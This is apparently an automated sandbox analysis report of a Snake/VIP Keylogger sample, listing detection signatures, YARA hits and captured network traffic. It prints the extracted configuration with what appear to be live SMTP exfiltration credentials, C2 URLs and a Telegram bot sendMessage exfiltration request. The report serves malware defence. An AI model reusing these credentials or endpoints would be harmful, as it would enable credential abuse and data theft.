Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
W2k2NLSvja.exe

Overview

General Information

Sample name:W2k2NLSvja.exe
renamed because original name is a hash value
Original sample name:3C81CD20323C282181D40FA0E8AB7B66DFD46EDD7BAFC3D6ABEB072420B314FE.exe
Analysis ID:1583667
MD5:3e473d16c81dd66fee6f02537b601626
SHA1:82f7667f0d8aecc63ce5fb9d86ec3d651223676d
SHA256:3c81cd20323c282181d40fa0e8ab7b66dfd46edd7bafc3d6abeb072420b314fe
Tags:exeuser-zhuzhu0009
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • W2k2NLSvja.exe (PID: 5700 cmdline: "C:\Users\user\Desktop\W2k2NLSvja.exe" MD5: 3E473D16C81DD66FEE6F02537B601626)
    • RegSvcs.exe (PID: 6504 cmdline: "C:\Users\user\Desktop\W2k2NLSvja.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "info@tradolgt.com", "Password": "445566nniI", "Host": "mail.tradolgt.com", "Port": "587", "Version": "4.4"}
{"Exfil Mode": "SMTP", "Username": "info@tradolgt.com", "Password": "445566nniI", "Host": "mail.tradolgt.com", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.2036650956.0000000001580000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000000.00000002.2036650956.0000000001580000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      00000000.00000002.2036650956.0000000001580000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000000.00000002.2036650956.0000000001580000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000000.00000002.2036650956.0000000001580000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x2d3f3:$a1: get_encryptedPassword
          • 0x2d710:$a2: get_encryptedUsername
          • 0x2d203:$a3: get_timePasswordChanged
          • 0x2d30c:$a4: get_passwordField
          • 0x2d409:$a5: set_encryptedPassword
          • 0x2ea3b:$a7: get_logins
          • 0x2e99e:$a10: KeyLoggerEventArgs
          • 0x2e631:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 16 entries
          SourceRuleDescriptionAuthorStrings
          0.2.W2k2NLSvja.exe.1580000.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0.2.W2k2NLSvja.exe.1580000.1.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              0.2.W2k2NLSvja.exe.1580000.1.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                0.2.W2k2NLSvja.exe.1580000.1.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x2b5f3:$a1: get_encryptedPassword
                • 0x2b910:$a2: get_encryptedUsername
                • 0x2b403:$a3: get_timePasswordChanged
                • 0x2b50c:$a4: get_passwordField
                • 0x2b609:$a5: set_encryptedPassword
                • 0x2cc3b:$a7: get_logins
                • 0x2cb9e:$a10: KeyLoggerEventArgs
                • 0x2c831:$a11: KeyLoggerEventArgsEventHandler
                0.2.W2k2NLSvja.exe.1580000.1.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x392a0:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x38943:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x38ba0:$a4: \Orbitum\User Data\Default\Login Data
                • 0x3957f:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 15 entries

                System Summary

                barindex
                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 208.91.199.115, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 6504, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49727
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-03T09:49:01.998995+010028033053Unknown Traffic192.168.2.549706188.114.97.3443TCP
                2025-01-03T09:49:05.946265+010028033053Unknown Traffic192.168.2.549712188.114.97.3443TCP
                2025-01-03T09:49:07.288410+010028033053Unknown Traffic192.168.2.549714188.114.97.3443TCP
                2025-01-03T09:49:08.599276+010028033053Unknown Traffic192.168.2.549716188.114.97.3443TCP
                2025-01-03T09:49:09.976605+010028033053Unknown Traffic192.168.2.549718188.114.97.3443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-03T09:49:00.541445+010028032742Potentially Bad Traffic192.168.2.549704132.226.247.7380TCP
                2025-01-03T09:49:01.447780+010028032742Potentially Bad Traffic192.168.2.549704132.226.247.7380TCP
                2025-01-03T09:49:02.744582+010028032742Potentially Bad Traffic192.168.2.549707132.226.247.7380TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-03T09:49:12.230937+010018100071Potentially Bad Traffic192.168.2.549721149.154.167.220443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: W2k2NLSvja.exeAvira: detected
                Source: W2k2NLSvja.exeAvira: detected
                Source: W2k2NLSvja.exeAvira: detected
                Source: 00000002.00000002.4485162305.0000000003281000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "info@tradolgt.com", "Password": "445566nniI", "Host": "mail.tradolgt.com", "Port": "587", "Version": "4.4"}
                Source: 2.2.RegSvcs.exe.400000.0.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "info@tradolgt.com", "Password": "445566nniI", "Host": "mail.tradolgt.com", "Port": "587", "Version": "4.4"}
                Source: W2k2NLSvja.exeVirustotal: Detection: 71%Perma Link
                Source: W2k2NLSvja.exeReversingLabs: Detection: 73%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                Source: W2k2NLSvja.exeJoe Sandbox ML: detected

                Location Tracking

                barindex
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: W2k2NLSvja.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49721 version: TLS 1.2
                Source: Binary string: wntdll.pdbUGP source: W2k2NLSvja.exe, 00000000.00000003.2035571464.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, W2k2NLSvja.exe, 00000000.00000003.2034512449.0000000003D60000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: W2k2NLSvja.exe, 00000000.00000003.2035571464.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, W2k2NLSvja.exe, 00000000.00000003.2034512449.0000000003D60000.00000004.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FE4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00FE4696
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FEC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00FEC9C7
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FEC93C FindFirstFileW,FindClose,0_2_00FEC93C
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FEF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00FEF200
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FEF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00FEF35D
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FEF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00FEF65E
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FE3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00FE3A2B
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FE3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00FE3D4E
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FEBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00FEBF27
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 018CF475h2_2_018CF2D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 018CF475h2_2_018CF545
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 018CF475h2_2_018CF4C4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 018CFC31h2_2_018CF979

                Networking

                barindex
                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49721 -> 149.154.167.220:443
                Source: unknownDNS query: name: api.telegram.org
                Source: Yara matchFile source: 0.2.W2k2NLSvja.exe.1580000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2036650956.0000000001580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: global trafficTCP traffic: 192.168.2.5:49727 -> 208.91.199.115:587
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:642294%0D%0ADate%20and%20Time:%2003/01/2025%20/%2015:43:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20642294%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49707 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49716 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49714 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49712 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49706 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49718 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.5:49727 -> 208.91.199.115:587
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\W2k2NLSvja.exeCode function: 0_2_00FF25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00FF25E2
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:642294%0D%0ADate%20and%20Time:%2003/01/2025%20/%2015:43:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20642294%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficDNS traffic detected: DNS query: mail.tradolgt.com
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 03 Jan 2025 08:49:12 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: RegSvcs.exe, 00000002.00000002.4485162305.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                Source: W2k2NLSvja.exe, 00000000.00000002.2036650956.0000000001580000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4484145905.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: W2k2NLSvja.exe, 00000000.00000002.2036650956.0000000001580000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4485162305.0000000003281000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4484145905.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: W2k2NLSvja.exe, 00000000.00000002.2036650956.0000000001580000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4485162305.0000000003281000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4484145905.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: RegSvcs.exe, 00000002.00000002.4485162305.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: RegSvcs.exe, 00000002.00000002.4485162305.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: W2k2NLSvja.exe, 00000000.00000002.2036650956.0000000001580000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4484145905.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: RegSvcs.exe, 00000002.00000002.4485162305.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4485162305.000000000357C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4485162305.0000000003751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.tradolgt.com
                Source: RegSvcs.exe, 00000002.00000002.4488752677.0000000006780000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4485162305.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4488752677.000000000684E000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4484266848.000000000141A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4488752677.0000000006849000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4485162305.000000000357C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4488752677.00000000067FA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4485162305.0000000003751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r11.i.lencr.org/0
                Source: RegSvcs.exe, 00000002.00000002.4488752677.0000000006780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.o.M
                Source: RegSvcs.exe, 00000002.00000002.4488752677.0000000006780000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4485162305.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4488752677.000000000684E000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4484266848.000000000141A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4488752677.0000000006849000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4485162305.000000000357C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4488752677.00000000067FA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4485162305.0000000003751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r11.o.lencr.org0#
                Source: RegSvcs.exe, 00000002.00000002.4485162305.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: W2k2NLSvja.exe, 00000000.00000002.2036650956.0000000001580000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4485162305.0000000003281000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4484145905.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: RegSvcs.exe, 00000002.00000002.4488752677.00000000067FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.l3
                Source: RegSvcs.exe, 00000002.00000002.4488752677.0000000006780000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4488752677.0000000006845000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4488752677.0000000006841000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4485162305.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4484266848.000000000141A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4485162305.000000000357C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4488752677.00000000067FA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4485162305.0000000003751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
